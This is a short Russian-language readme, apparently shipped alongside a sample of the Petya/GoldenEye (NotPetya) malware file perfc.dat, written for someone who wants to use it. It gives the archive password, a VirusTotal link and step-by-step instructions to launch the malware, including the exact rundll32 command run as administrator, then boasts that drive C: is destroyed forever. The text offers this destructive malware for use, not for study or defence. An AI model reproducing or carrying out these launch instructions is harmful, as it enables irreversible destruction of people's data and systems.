Привет!

Ты захотел использовать trojan.petya/goldeneye?

Тогда это и правда что тебе надо.

ПАРОЛЬ ОТ perfc.dat: 123

Вот анализ этого вредоноса: https://www.virustotal.com/gui/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/detection

Что бы запустить вирус, надо:
1. Скопировать perfc.dat в C:\Windows\
2. Запустить cmd от имени администратора и ввести вот эту комманду:

------------------------------------------
rundll32.exe "C:\Windows\perfc.dat", #1 30
------------------------------------------
3. Если ПК не перезапускается сам, перезапустить через минут 10~20

И всё!

Диск C: убит навсегда 💀💀💀